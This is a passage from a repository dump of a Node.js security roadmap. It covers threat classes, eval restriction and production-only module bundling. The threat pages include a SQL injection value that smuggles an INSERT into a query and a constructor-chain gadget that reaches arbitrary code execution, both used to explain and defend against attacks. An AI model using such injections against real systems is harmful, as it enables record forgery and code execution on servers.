29 | 30 | ```js 31 | value = '"; INSERT INTO Table ... --' 32 | ``` 33 | 34 | can violate system integrity by forging records: 35 | 36 | ```js 37 | ' SELECT * FROM Table WHERE key="' + value + '" ' === 38 | ' SELECT * FROM Table WHERE key=""; INSERT INTO Table ... --" ' 39 | ``` 40 | 41 | or deny service via mass deletes. 42 | 43 | Query injection has a [long and storied history][hall-of-shame]. 44 | 45 | [Query injection]: http://bobby-tables.com/ 46 | [hall-of-shame]: http://codecurmudgeon.com/wp/sql-injection-hall-of-shame/ 47 | [spp]: https://rawgit.com/mikesamuel/sanitized-jquery-templates/trunk/safetemplate.html#structure_preservation_property 48 | -------------------------------------------------------------------------------- /chapter-1/threat-RCE.md: -------------------------------------------------------------------------------- 1 | # Remote Code Execution 2 | 3 | Remote code execution occurs when the application interprets an 4 | untrustworthy string as code. When `x` is a string, `eval(x)`, 5 | `Function(x)`, and `vm.runIn*Context(x)` all invoke the JavaScript 6 | engine's parser on `x`. If an attacker controls `x` then they can run 7 | arbitrary code in the context of the CommonJS module or `vm` context 8 | that invoked the parser. 9 | 10 | Sandboxing can help but widely available sandboxes have 11 | [known workarounds][denicola-vm-run] though the [frozen realms][] 12 | proposal aims to change that. 13 | 14 | It is harder to execute remote code in server-side JavaScript. 15 | `this[x][y] = "javascript:console.log(1)"` does not cause code to 16 | execute for nearly as many `x` and `y` as in a browser. 17 | 18 | These operators are probably rarely used *explicitly*, but some 19 | operators that convert strings to code when given a string do 20 | something else when given a `Function` instance. `setTimeout(x, 0)` 21 | is safe when `x` is a function, but on the browser it parses a string 22 | input as code. 23 | 24 | * [Grepping](../appendix/experiments.md#grep-problems) shows the rate 25 | in the top 100 modules and their transitive dependencies by simple 26 | pattern matching after filtering out comments and string content. 27 | This analysis works on most modules, but fails to distinguish 28 | safe uses of `setTimeout` in modules that might run on 29 | the client from unsafe. 30 | * A [type based analysis](../appendix/experiments.md#jsconf) can 31 | distinguish between those two, but the tools we tested don't 32 | deal well with mixed JavaScript and TypeScript inputs. 33 | 34 | Even if we could reliably identify places where strings are 35 | *explicitly* converted to code for the bulk of npm modules, 36 | it is more difficult in JavaScript to statically prove that 37 | code does not *implicitly* invoke a parser than in other 38 | common backend languages. 39 | 40 | ```js 41 | // Let x be any value not in 42 | // (null, undefined, Object.create(null)). 43 | var x = {}, 44 | // If the attacker can control three strings 45 | a = 'constructor', 46 | b = 'constructor', 47 | s = 'console.log(s)'; 48 | // and trick code into doing two property lookups 49 | // they control, a call with a string they control, 50 | // and one more call with any argument 51 | x[a][b](s)(); 52 | // then they can cause any side-effect achievable 53 | // solely via objects reachable from the global scope. 54 | // This includes full access to any exported module APIs, 55 | // all declarations in the current module, and access 56 | // to builtin modules like child_process, fs, and net. 57 | ``` 58 | 59 | Filtering out values of `s` that "look like JavaScript" as they reach 60 | server-side code will probably not prevent code execution. 61 | [Yosuke Hasegawa][Yosuke] how to reencode arbitrary JavaScript using 62 | only 6 punctuation characters, and that number may 63 | [fall to 5][Masato]. ["Web Application Obfuscation"][obfusc] by 64 | Heiderich et al. catalogues ways to bypass filtering. 65 | 66 | `eval` also allows remote-code execution in Python, PHP, and 67 | Ruby code, but in those languages `eval` operators are harder to 68 | mention implicitly which means uses are easier to check. 69 | 70 | It is possible to dynamically evaluate strings even in statically 71 | compiled languages, for example, [JSR 223][] and 72 | [`javax.compiler`][dynjava] for Java. In statically compiled 73 | languages there is no short implicit path to `eval` and it is not 74 | easier to `eval` an untrusted input than to use an intepreter that is 75 | isolated from the host environment. 76 | 77 | We consider remote code execution in Node.js lower frequency than for 78 | client-side JavaScript without a Content-Security-Policy but higher 79 | than for other backend languages. We consider the severity the same 80 | as for other backend languages. The serverity is higher than for 81 | client-side JavaScript because backend code often has access to more 82 | than one user's data and privileged access to other backends. 83 | 84 | [denicola-vm-run]: https://gist.github.com/domenic/d15dfd8f06ae5d1109b0 85 | [frozen realms]: https://github.com/tc39/proposal-frozen-realms 86 | [Yosuke]: https://news.ycombinator.com/item?id=4370098 87 | [Masato]: https://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html 88 | [obfusc]: https://www.amazon.com/Web-Application-Obfuscation-Evasion-Filters/dp/1597496049 89 | [JSR 223]: https://docs.oracle.com/javase/8/docs/technotes/guides/scripting/prog_guide/api.html 90 | [dynjava]: https://www.ibm.com/developerworks/library/j-jcomp/index.html 91 | -------------------------------------------------------------------------------- /chapter-1/threat-SHP.md: -------------------------------------------------------------------------------- 1 | # Shell Injection during Production 2 | 3 | [Shell injection][] occurs when an attacker-controlled string changes 4 | the structure of a command passed to a shell or causes a child process 5 | to execute an unintended command or with unintended arguments. 6 | Typically, this is because code or a dependency invokes 7 | [child\_process][api/child_process] with an argument partially 8 | composed from untrusted inputs. 9 | 10 | Shell injection may also occur during development and deployment. For 11 | example, [npm][npm hooks] and [Bower][bower hooks] 12 | `{pre-,,post-}install` hooks may be subject to shell injection via 13 | filenames that contain shell meta-characters in malicious transitive 14 | dependencies but we classify this as an [MTP][] vulnerability. 15 | 16 | [MTP]: threat-MTP.md 17 | [npm hooks]: https://docs.npmjs.com/misc/scripts 18 | [bower hooks]: https://bower.io/docs/config/#hooks 19 | [Shell injection]: http://cwe.mitre.org/data/definitions/77.html 20 | [api/child_process]: https://nodejs.org/api/child_process.html 21 | -------------------------------------------------------------------------------- /chapter-1/threats.md: -------------------------------------------------------------------------------- 1 | # Threat environment 2 | 3 | The threat environment for Node.js is similar to that for other runtimes that 4 | are primarily used for microservices and web frontends, but there are some 5 | Node.js specific concerns. 6 | 7 | We define both kinds of threats in this section. A reader familiar with 8 | web-application security can skip all but this page and the discussion 9 | of [*unintended require*][UIR] without missing much, but may find it 10 | helpful to refer back to the table below when reading later chapters. 11 | 12 | ## Server vs Client-side JavaScript 13 | 14 | Before we discuss the threat environment, it's worth noting that the threat 15 | environment for server-side JavaScript is quite different from that for 16 | client-side JavaScript. For example, 17 | 18 | * Client-side JavaScript runs in the context of the 19 | [same-origin policy][] possibly with a 20 | [Content-Security-Policy][CSP] which governs which code can load. 21 | Server-side JavaScript **code loading** is typically only 22 | constrained by the files on the server, and the values that can 23 | reach `require(...)`, `eval(...)` and similar operators. 24 | * Client-side JavaScript typically only has access to data that the 25 | human using the browser should have access to. On the server, 26 | applications are responsible for **data [compartmentalization][]**, 27 | and server-side JavaScript often has privileged access to storage 28 | systems and other backends. 29 | * **File-system access** by the client typically either requires human 30 | interaction 31 | (``, `Content-disposition:attachment`), or can only access 32 | a directory dedicated to third-party content (browser cache, local storage) 33 | and which is not usually on a list like `$PATH`. 34 | On the server, the Node runtime process's privileges determine 35 | [file-system access][nodejs/fs]. 36 | * Client-side JavaScript has no concept of a **shell** that converts 37 | strings into commands that runs outside the JavaScript engine. 38 | Server-side JavaScript can spawn 39 | [child processes][nodejs/child_process] that operate on data 40 | received over the network, and on data that is accessible to the 41 | Node runtime process. 42 | * **Network messages** sent by server-side JavaScript originate inside 43 | the server's LAN, but those sent by client-side JavaScript typically do not. 44 | * **Shared memory concurrency** in client-side JavaScript happens via 45 | well-understood APIs like `SharedArrayBuffer`. Experimental modules 46 | ([code][threads-a-gogo]) and a [workers proposal][] 47 | allow server-side JavaScript to fork threads; it is 48 | unclear how widespread these are in production or how 49 | [susceptible][thread corner cases] these are to memory corruption 50 | or exploitable race conditions. 51 | * Client-side, the browser halts all scripts in a document when a 52 | single event loop cycle **runs too long**. 53 | Node.js has few ways to manage runaway computations on the server. 54 | 55 | The threat environment for server-side JavaScript is much closer to 56 | that for any other server-side framework than JavaScript in the 57 | browser. 58 | 59 | ## Classes of Threats {#threat_table} 60 | 61 | The table below lists broad classes of vulnerabilities, and for each, 62 | a short identifier by which we refer to the class later in this 63 | document. This list is not meant to be comprehensive, but we expect 64 | that a thorough security assessment would touch on most of these and 65 | would have low confidence in an assessment that skips many. 66 | 67 | The frequency and severity of vulnerabilities are guesstimates since 68 | we have little hard data on the frequency of these in Node.js 69 | applications, so have extrapolated from similar systems. For example, 70 | see discussion about frequency in [buffer overflow][BOF]. 71 | 72 | For each, relevant mitigation strategies appear in the mitigations 73 | columns, and link to the discussion. 74 | 75 | | Shorthand | Description | Frequency | Severity | Mitigations | 76 | | --------- | ------------------------------------------------------------------------------------- | --------- | -------- | --------------------------- | 77 | | [0DY][] | Zero-day. Attackers exploit a vulnerability before a fix is available. | Low-Med | Med-High | [cdeps][m-cd] [fail][m-fa] | 78 | | [BOF][] | Buffer overflow. | Low | High | [ovrsi][m-os] | 79 | | [CRY][] | Misuse of crypto leads to poor access-control decisions or data leaks. | Medium | Medium | [ovrsi][m-os] | 80 | | [DEX][] | Poor developer experience slows or prevents release of features. | ? | ? | [dynam][m-dy] [ovrsi][m-os] | 81 | | [DOS][] | Denial of service | Medium | Low-Med | TBD | 82 | | [EXF][] | Exfiltration of data, e.g. by exploiting reflection to serialize more than intended. | Med-High | Low-Med | [ovrsi][m-os] | 83 | | [LQC][] | Using low quality dependencies leads to exploit | Medium | Low-Med | [kdeps][m-kd] [ovrsi][m-os] | 84 | | [MTP][] | Theft of commit rights or MITM causes `npm install` to fetch malicious code. | Low | Med-High | [kdeps][m-kd] [cdeps][m-cd] | 85 | | [QUI][] | Query injection on a production machine. | Medium | Med-High | [ovrsi][m-os] [qlang][m-ql] | 86 | | [RCE][] | Remote code execution, e.g. via `eval` | Med-High | High | [dynam][m-dy] [ovrsi][m-os] | 87 | | [SHP][] | Shell injection on a production machine. | Low | High | [ovrsi][m-os] [cproc][m-cp] | 88 | | [UIR][] | `require(untrustworthyInput)` loads code not intended for production. | Low | Low-High | [dynam][m-dy] | 89 | 90 | 91 | ## Meltdown and Spectre 92 | 93 | As of this writing, the security community is trying to digest 94 | the implications of *Meltdown* and *Spectre*. The 95 | [Node.js blog][Meltdown Spectre Impact] addresses them from a 96 | Node.js perspective, so we do not comment in depth. 97 | 98 | It is worth noting though that those vulnerabilities lead to 99 | breaches of *confidentiality*. While confidentiality violations 100 | are serious, the suggestions that follow use design principles 101 | that prevent a violation of confidentiality from causing a 102 | violation of *integrity*. Specifically: 103 | 104 | * Knowing a whitelist of production source hashes does not 105 | allow an attacker to cause a non-production source to load. 106 | * Our runtime `eval` mitigation relies on JavaScript reference 107 | equality, not knowledge of a secret. 108 | 109 | 110 | [same-origin policy]: https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy 111 | [CSP]: https://developers.google.com/web/fundamentals/security/csp/ 112 | [compartmentalization]: https://cwe.mitre.org/data/definitions/653.html 113 | [nodejs/fs]: https://nodejs.org/api/fs.html 114 | [nodejs/child_process]: https://nodejs.org/api/child_process.html 115 | [threads-a-gogo]: https://github.com/xk/node-threads-a-gogo/blob/74005641d53b0d85e8d75e2506eddbded15f5112/src/threads_a_gogo.cc#L1387 116 | [workers proposal]: https://github.com/nodejs/worker/issues/2 117 | [thread corner cases]: https://github.com/nodejs/worker/issues/4#issuecomment-306090967 118 | [Query Injection]: https://cwe.mitre.org/data/definitions/89.html 119 | [0DY]: threat-0DY.md 120 | [BOF]: threat-BOF.md 121 | [CRY]: threat-CRY.md 122 | [DEX]: threat-DEX.md 123 | [DOS]: threat-DOS.md 124 | [EXF]: threat-EXF.md 125 | [LQC]: threat-LQC.md 126 | [MTP]: threat-MTP.md 127 | [QUI]: threat-QUI.md 128 | [RCE]: threat-RCE.md 129 | [SHP]: threat-SHP.md 130 | [UIR]: threat-UIR.md 131 | [m-dy]: ../chapter-2/dynamism.md 132 | [m-kd]: ../chapter-3/knowing_dependencies.md 133 | [m-cd]: ../chapter-4/close_dependencies.md 134 | [m-os]: ../chapter-5/oversight.md 135 | [m-fa]: ../chapter-6/failing.md 136 | [m-cp]: ../chapter-7/child-processes.md 137 | [m-ql]: ../chapter-7/query-langs.md 138 | [Meltdown Spectre Impact]: https://nodejs.org/en/blog/vulnerability/jan-2018-spectre-meltdown/ 139 | -------------------------------------------------------------------------------- /chapter-2/bounded-eval.md: -------------------------------------------------------------------------------- 1 | # Dynamically bounding `eval` 2 | 3 | If we could provide an API that was available statically, but not dynamically 4 | we could double-check uses of `eval` operators. 5 | 6 | ```js 7 | // API for allowing some eval 8 | var prettyPlease = require('prettyPlease'); 9 | // Carefully reviewed JavaScript generating code 10 | var codeGenerator = require('codeGenerator'); 11 | 12 | let compile; 13 | 14 | prettyPlease.mayI( 15 | module, 16 | (evalPermission) => { 17 | compile = function (source) { 18 | const js = codeGenerator.generateCode(source); 19 | return prettyPlease.letMeEval( 20 | evalPermission, 21 | js, 22 | () => ((0, eval)(js))); 23 | }; 24 | }); 25 | 26 | exports.compile = compile; 27 | ``` 28 | 29 | The `prettyPlease` module cannot be pure JavaScript since only the 30 | C++ linker can take advantage of *CodeGeneration* callbacks 31 | ([code][CodeGeneration callbacks]) the way CSP does 32 | ([code][CSP callback]) on the client, but the definition would be 33 | roughly: 34 | 35 | ```js 36 | // prettyPlease module 37 | (() => { 38 | const _PERMISSIVE_MODE = 0; // Default 39 | const _STRICT_MODE = 1; 40 | const _REPORT_ONLY_MODE = 2; 41 | 42 | const _MODE = /* From command line arguments */; 43 | const _WHITELIST = new Set(/* From command line arguments */); 44 | 45 | const _VALID_PERMISSIONS = new WeakSet(); 46 | const _EVALABLE_SOURCES = new Map(); 47 | 48 | if (_MODE !== _PERMISSIVE_MODE) { 49 | // Pseudocode: the code-generation callback installed when the 50 | // JavaScript engine is initialized. 51 | function codeGenerationCheckCallback(context, source) { 52 | // source must be a v8::Local or ChakraCore equivalent 53 | // so no risk of polymorphing 54 | if (_EVALABLE_SOURCES.has(source)) { 55 | return true; 56 | } 57 | console.warn(...); 58 | return _MODE == _REPORT_ONLY_MODE; 59 | } 60 | } 61 | 62 | // requestor -- the `module` value in the scope of the code requesting 63 | // permissions. 64 | // callback -- called with the generated permission whether granted or 65 | // not. This puts the permission in a parameter name making it 66 | // much less likely that an attacker who controls a key to obj[key] 67 | // can steal it. 68 | module.mayI = function (requestor, callback) { 69 | const id = String(requestor.id); 70 | const filename = String(requestor.filename); 71 | const permission = Object.create(null); // Token used for identity 72 | // TODO: Needs privileged access to real module cache so a module 73 | // can't masquerade as another by mutating the module cache. 74 | if (_MODE !== _PERMISSIVE_MODE 75 | && requestor === require.cache[filename] 76 | && _WHITELIST.has(id)) { 77 | _VALID_PERMISSIONS.add(permission); 78 | // Typical usage is to request permission once during module load. 79 | // Removing from whitelist prevents later bogus requests after 80 | // the module is exposed to untrusted inputs. 81 | _WHITELIST.delete(id); 82 | } 83 | return callback(permission); 84 | }; 85 | 86 | // permission -- a value received via mayI 87 | // sourceToEval -- code to eval. The code generation callback will 88 | // expect this exact string as its source. 89 | // codeThatEvals -- a callback that will be called in a scope that 90 | // allows eval of sourceToEval. 91 | module.letMeEval = function (permission, sourceToEval, codeThatEvals) { 92 | sourceToEval = String(sourceToEval); 93 | if (_MODE === _PERMISSIVE_MODE) { 94 | return codeThatEvals(); 95 | } 96 | 97 | if (!_VALID_PERMISSIONS.has(permission)) { 98 | console.warn(...); 99 | if (_MODE !== _REPORT_ONLY_MODE) { 100 | return codeThatEvals(); 101 | } 102 | } 103 | 104 | const countBefore = _EVALABLE_SOURCES.get(sourceToEval) || 0; 105 | _EVALABLE_SOURCES.set(sourceToEval, countBefore + 1); 106 | try { 107 | return codeThatEvals(); 108 | } finally { 109 | if (countBefore) { 110 | _EVALABLE_SOURCES.set(sourceToEval, countBefore); 111 | } else { 112 | _EVALABLE_SOURCES.delete(sourceToEval); 113 | } 114 | } 115 | }; 116 | })(); 117 | ``` 118 | 119 | and the `eval` operators would check that their argument is in the global 120 | set. 121 | 122 | Implicit access to `eval` is possible because reflective operators can 123 | reach `eval`. As long as we can prevent reflective access to 124 | `evalPermissions` we can constrain what can be `eval`ed. If 125 | `evalPermission` is a function parameter, then only `arguments` 126 | aliases it, so functions that do not mention the special name 127 | `arguments` may safely receive one. Most functions do not mention 128 | `arguments`. Before whitelisting a module, a reviewer would be wise 129 | to check for any use of `arguments`, and for any escape of permissions 130 | or `module`. 131 | 132 | `evalPermission` is an opaque token — only its reference identity 133 | is significant, so we can check membership in a `WeakSet` without 134 | risk of forgery. 135 | 136 | This requires API changes to existing modules that dynamically use 137 | `eval`, but the changes should be additive and straightforward. 138 | 139 | It also allows project teams and security specialists to decide on 140 | a case-by-case basis, which modules really need dynamic `eval`. 141 | 142 | As with synthetic modules, frozen realms may provide a way to further 143 | restrict what dynamically loaded code can do. If you're trying to 144 | decide whether to trust a module that dynamically loads code, you have 145 | more ways to justifiably conclude that it's safe if the module loads 146 | into a sandbox restricts to a limited frozen API. 147 | 148 | [CodeGeneration callbacks]: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/bindings/core/v8/V8Initializer.cpp?rcl=ed08e77a52d977fdb8f4c2a0b27e3d5a73019a57&l=626 149 | [CSP callback]: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/bindings/core/v8/V8Initializer.cpp?rcl=ed08e77a52d977fdb8f4c2a0b27e3d5a73019a57&l=352 150 | -------------------------------------------------------------------------------- /chapter-2/bundling.md: -------------------------------------------------------------------------------- 1 | # Dynamic Bundling 2 | 3 | Consider a simple Node application: 4 | 5 | ```js 6 | // index.js 7 | // Example that uses various require(...) use cases. 8 | 9 | let staticLoad = require('./lib/static'); 10 | function dynamicLoad(f, x) { 11 | return f('./lib/' + x); 12 | } 13 | dynamicLoad(require, Math.random() < 2 ? 'dynamic' : 'bogus'); 14 | exports.lazyLoad = () => require('./lib/lazy'); 15 | 16 | // Fallback to alternatives 17 | require(['./lib/opt1', './lib/opt2'].find( 18 | (name) => { 19 | try { 20 | require.resolve(name); 21 | return true; 22 | } catch (_) { 23 | return false; 24 | } 25 | })); 26 | ``` 27 | 28 | with some unit tests: 29 | 30 | ```js 31 | // test/test.js 32 | 33 | var expect = require("chai").expect; 34 | var app = require("../index"); 35 | 36 | describe("My TestSuite", () => { 37 | describe("A test", () => { 38 | it("A unittest", () => { 39 | // Exercise the API 40 | app.lazyLoad(); 41 | }); 42 | }); 43 | }); 44 | ``` 45 | 46 | We hack `updateChildren`, which gets called by `Module._load` for new 47 | modules and when a module requires a cached module, to dump information 48 | about loads: 49 | 50 | ```diff 51 | diff --git a/lib/module.js b/lib/module.js 52 | index cc8d5097bb..945ab8a4a8 100644 53 | --- a/lib/module.js 54 | +++ b/lib/module.js 55 | @@ -59,8 +59,18 @@ stat.cache = null; 56 | 57 | function updateChildren(parent, child, scan) { 58 | var children = parent && parent.children; 59 | - if (children && !(scan && children.includes(child))) 60 | + if (children && !(scan && children.includes(child))) { 61 | + if (parent.filename && child.id) { 62 | + // HACK: rather than require('fs') to write a file out, we 63 | + // log to the console. 64 | + // We assume the prefix will be removed and the result wrapped in 65 | + // a DOT digraph. 66 | + console.log( 67 | + 'REQUIRE_LOG_DOT: ' + JSON.stringify(parent.filename) 68 | + + ' -> ' + JSON.stringify(child.id) + ';'); 69 | + } 70 | children.push(child); 71 | + } 72 | } 73 | ``` 74 | 75 | Running the tests and extracting the graph ([code][extract-script]) 76 | gives us a rather [hairy dependency graph](example/graphs/full.svg): 77 | 78 | 79 | 80 | We add an edge from `"./package.json"` to the module's main file. 81 | Then we filter edges ([code][graph-filter]) to include only those 82 | reachable from `"./package.json"`. This lets us distinguish files 83 | loaded by the test runner and tests from those loaded after control 84 | has entered an API in a production file. 85 | 86 | The resulting graph is much simpler: 87 | 88 | ![Production Source Files](example/graphs/filtered.svg) 89 | 90 | Note that the production file list includes dynamically and lazily 91 | loaded files. It does include `./lib/opt2.js` but not `./lib/opt1.js`. 92 | The former file does not exist, so the loop which picks the first 93 | available alternative tries and finds the latter. 94 | 95 | Our production source list should include all the files we need 96 | in production if 97 | 98 | * The unit tests `require` the main file 99 | * The unit tests have enough coverage to load all modules required 100 | in production via APIs defined in the main file or in APIs 101 | transitively loaded from there. 102 | 103 | It is definitely possible to miss some files. If the unit test did 104 | not call `app.lazyLoad` then there would be no edge to 105 | `./lib/lazy.js`. To address this, developers can 106 | 107 | * Expand test coverage to exercise code paths that load the 108 | missing source files. 109 | * Or add an explicit whitelist like 110 | ```js 111 | // production-source-whitelist.js 112 | require('./index.js'); 113 | require('./lib/lazy.js'); 114 | ``` 115 | and explicitly pass this as the main file to the filter 116 | instead of defaulting to the one specified in `package.json`. 117 | 118 | Dynamic analysis is not perfect, but a missing source file is 119 | readily apparent, so this replaces 120 | 121 | * hard-to-detect bugs with potentially severe security consequences, 122 | 123 | with 124 | 125 | * easy-to-detect bugs with negligible security consequences. 126 | 127 | [extract-script]: https://github.com/google/node-sec-roadmap/blob/master/chapter-2/example/make_dep_graph.sh 128 | [graph-filter]: https://github.com/google/node-sec-roadmap/blob/6130b76446ff4efbb276d8128c12e41ea2fffbc9/chapter-2/example/make_dep_graph.sh#L39-L73 129 | -------------------------------------------------------------------------------- /chapter-2/dynamism.md: -------------------------------------------------------------------------------- 1 | # Dynamism when you need it 2 | 3 | ## Background 4 | 5 | Node.js code is composed of CommonJS modules that are linked together 6 | by the builtin `require` function, or [`import`][import-js] statements 7 | (used by [TypeScript][import-ts]) that typically transpile to 8 | `require` (modulo [experimental features][esm]). 9 | 10 | `require` itself calls `Module._load` ([code][Module._load]) to 11 | resolve and load code. ["The Node.js Way"][FKS] explains this flow 12 | well. 13 | 14 | Unlike `import`, `require` is dynamic: a runtime value can specify the 15 | name of a module to load. (The EcmaScript committee is considering a 16 | [dynamic `import` operator][import-op-strawman], but we have 17 | not included that in this analysis.) 18 | 19 | 20 | This dynamism is powerful and flexible and enables varied use cases 21 | like the following: 22 | 23 | * Lazy loading. Waiting to load a dependency until it is definitely needed. 24 | ```js 25 | const infrequentlyUsedAPI = (function () { 26 | const dependency = require('dependency'); 27 | return function infrequentlyUsedAPI() { 28 | // Use dependency 29 | }; 30 | }()); 31 | ``` 32 | * Loading plugins based on a configuration object. 33 | ```js 34 | function Service(config) { 35 | (config.plugins || []).forEach( 36 | (pluginName) => { 37 | require(pluginName).initPlugin(this); 38 | }); 39 | } 40 | ``` 41 | * Falling back to an alternate service provider if the first choice 42 | isn't available: 43 | ```js 44 | const KNOWN_SERVICE_PROVIDERS = ['foo-widget', 'bar-widget']; 45 | const serviceProviderName = KNOWN_SERVICE_PROVIDERS.find( 46 | (name) => { 47 | try { 48 | require.resolve(name); 49 | return true; 50 | } catch (_) { 51 | return false; 52 | } 53 | }); 54 | const serviceProvider = require(serviceProviderName); 55 | ``` 56 | * Taking advantage of an optional dependency when it is available. 57 | ```js 58 | let optionalDependency = null; 59 | try { 60 | optionalDependency = require('optionalDependency'); 61 | } catch (_) { 62 | // Oh well. 63 | } 64 | ``` 65 | * Loading a handler for a runtime value based on a naming convention. 66 | ```js 67 | function handle(request) { 68 | const handlerName = request.type + '-handler'; // Documented convention 69 | let handler; 70 | try { 71 | handler = require(handlerName); 72 | } catch (e) { 73 | throw new Error( 74 | 'Expected handler ' + handlerName 75 | + ' for requests with type ' + request.type); 76 | } 77 | return handler.handle(request); 78 | } 79 | ``` 80 | * Introspecting over module metadata. 81 | ```js 82 | const version = require('./package.json').version; 83 | ``` 84 | 85 | During rapid development, [file-system monitors][nodemon] can restart 86 | a node project when source files change, and the application stitches 87 | itself together without the complex compiler and build system 88 | integration that statically compiled languages use to do incremental 89 | recompilation. 90 | 91 | 92 | ## Problem 93 | 94 | Threats: [DEX][] [RCE][] [UIR][] 95 | 96 | The `node_modules` directory does not keep production code separate 97 | from test code. If test code can be `require`d in production, then 98 | an attacker may find it far easier to execute a wide variety of other 99 | attacks. See [UIR][] for more details on this. 100 | 101 | Node applications rely on dynamic uses of `require` and changes that 102 | break any of these use cases would require coordinating large scale 103 | changes to existing code, tools, and development practices threatening 104 | [developer experience][DEX]. 105 | 106 | Requiring developers to pick and choose which source files are 107 | production and which are test would either: 108 | 109 | * Require them to scrutinize source files not only for their project 110 | but also for deep dependencies with which they are unfamiliar 111 | leading to poor developer experience. 112 | * Whitelist without scrutiny leading to the original security problem. 113 | * Lead them to not use available modules to solve problems and instead 114 | roll their own leading to poor developer experience, and possibly 115 | [LQC][] problems. 116 | 117 | We need to ensure that only source code written with production 118 | constraints in mind loads in production without increasing the burden 119 | on developers. 120 | 121 | When the behavior of code in production is markedly different from that 122 | on a developer's workstation, developers lose confidence that they 123 | can avoid bugs in production by testing locally which may lead 124 | to poor developer experience and lower quality code. 125 | 126 | 127 | ## Success Criteria 128 | 129 | We would have prevented abuse of `require` if: 130 | 131 | * Untrusted inputs could not cause `require` to load a 132 | non-production source file, 133 | * and/or no non-production source files are reachable by 134 | `require`, 135 | * and/or loading a non-production source file has no adverse effect. 136 | 137 | We would have successfully prevented abuse of `eval`, `new Function` 138 | and related operators if: 139 | 140 | * Untrusted inputs cannot reach an `eval` operator, 141 | * and/or untrusted inputs that reach them cause no adverse affects, 142 | * and/or security specialists could whitelist uses of `eval` operators 143 | that are necessary for the functioning of the larger 144 | system and compatible with the system's security goals. 145 | 146 | In both cases, converting dynamic operators to static before untrusted 147 | inputs reach the system reduces the attack surface. Requiring 148 | large-scale changes to existing npm modules or requiring large scale 149 | rewrites of code that uses using them constitutes compromises [DEX][]. 150 | 151 | 152 | ## Current practices 153 | 154 | Some development teams use [webpack][] or similar tools to statically 155 | bundle server-side modules, and provide flexible transpilation 156 | pipelines. That's a great way to do things, but solving security 157 | problems only for teams with development practices mature enough to 158 | deploy via webpack risks preaching to the choir. 159 | 160 | Webpack, in its minimal configuration, does not attempt to skip 161 | test files ([code][webpack-experiment]). 162 | Teams with an experienced webpack user can use it to great effect, but 163 | it is not an out-of-the-box solution. 164 | 165 | Webpacking does not prevent calls to `require(...)` with unintended 166 | arguments, but greatly reduces the chance that they will load 167 | non-production code. As long as the server process cannot read 168 | JS files other than those in the bundle, then a webpacked server 169 | is safe from [UIR][]. This may not be the case if the production 170 | machine has npm modules globally installed, and the server process 171 | is not running in a [chroot jail][]. 172 | 173 | 174 | ## A Possible Solution 175 | 176 | We present one possible solution to demonstrate that tackling this 177 | problem is feasible. 178 | 179 | If we can compute the entire set of `require`-able sources when 180 | dealing only with inputs from trusted sources, then we can 181 | ensure that the node runtime only loads those sources even when 182 | exposed to untrusted inputs. 183 | 184 | We propose these changes: 185 | 186 | * A two phase approach to prevent abuse of `require`. 187 | 1. Tweaks to the node module loader that make it easy to 188 | [dynamically bundle](bundling.md) a release candidate. 189 | 2. Tweaks to the node module loader in production to restrict 190 | code loads based on [source content hashes](source-contents.md) 191 | from the bundling phase. 192 | * Two different strategies for preventing abuse of 193 | [`eval`](what-about-eval.md). 194 | * JavaScript idioms that can allow many uses of `eval` to 195 | [load as modules](synthetic-modules.md) and to bundle as above. 196 | * Using JavaScript engine callbacks to 197 | [allow uses of `eval`](bounded-eval.md) by approved modules. 198 | 199 | [DEX]: ../chapter-1/threat-DEX.md 200 | [LQC]: ../chapter-1/threat-LQC.md 201 | [RCE]: ../chapter-1/threat-RCE.md 202 | [UIR]: ../chapter-1/threat-UIR.md 203 | [webpack]: https://webpack.js.org/ 204 | [Symbol]: (https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol) 205 | [import-js]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import 206 | [import-ts]: https://www.typescriptlang.org/docs/handbook/modules.html#import 207 | [Module._load]: https://github.com/nodejs/node/blob/0fdd88a374e23e1dd4a05d93afd5eb0c3b080fd5/lib/module.js#L449 208 | [FKS]: http://fredkschott.com/post/2014/06/require-and-the-module-system/ 209 | [esm]: https://nodejs.org/api/esm.html#esm_ecmascript_modules 210 | [nodemon]: https://nodemon.io/ 211 | [import-op-strawman]: https://github.com/tc39/proposal-dynamic-import 212 | [chroot jail]: https://help.ubuntu.com/community/BasicChroot 213 | [webpack-experiment]: https://github.com/google/node-sec-roadmap/tree/master/chapter-2/experiments/webpack-compat 214 | -------------------------------------------------------------------------------- /chapter-2/example/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | -------------------------------------------------------------------------------- /chapter-2/example/graphs/filtered.dot: -------------------------------------------------------------------------------- 1 | digraph Modules { 2 | "./package.json" [fillcolor=black,fontcolor=white,style=filled]; 3 | "./index.js" -> "./lib/static.js"; 4 | "./index.js" -> "./lib/dynamic.js"; 5 | "./index.js" -> "./lib/opt2.js"; 6 | "./index.js" -> "./lib/lazy.js"; 7 | "./package.json" -> "./index.js"; 8 | } 9 | -------------------------------------------------------------------------------- /chapter-2/example/graphs/filtered.svg: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 9 | 10 | Modules 11 | 12 | 13 | 14 | ./package.json 15 | 16 | ./package.json 17 | 18 | 19 | 20 | ./index.js 21 | 22 | ./index.js 23 | 24 | 25 | 26 | ./package.json->./index.js 27 | 28 | 29 | 30 | 31 | 32 | ./lib/static.js 33 | 34 | ./lib/static.js 35 | 36 | 37 | 38 | ./index.js->./lib/static.js 39 | 40 | 41 | 42 | 43 | 44 | ./lib/dynamic.js 45 | 46 | ./lib/dynamic.js 47 | 48 | 49 | 50 | ./index.js->./lib/dynamic.js 51 | 52 | 53 | 54 | 55 | 56 | ./lib/opt2.js 57 | 58 | ./lib/opt2.js 59 | 60 | 61 | 62 | ./index.js->./lib/opt2.js 63 | 64 | 65 | 66 | 67 | 68 | ./lib/lazy.js 69 | 70 | ./lib/lazy.js 71 | 72 | 73 | 74 | ./index.js->./lib/lazy.js 75 | 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /chapter-2/example/index.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 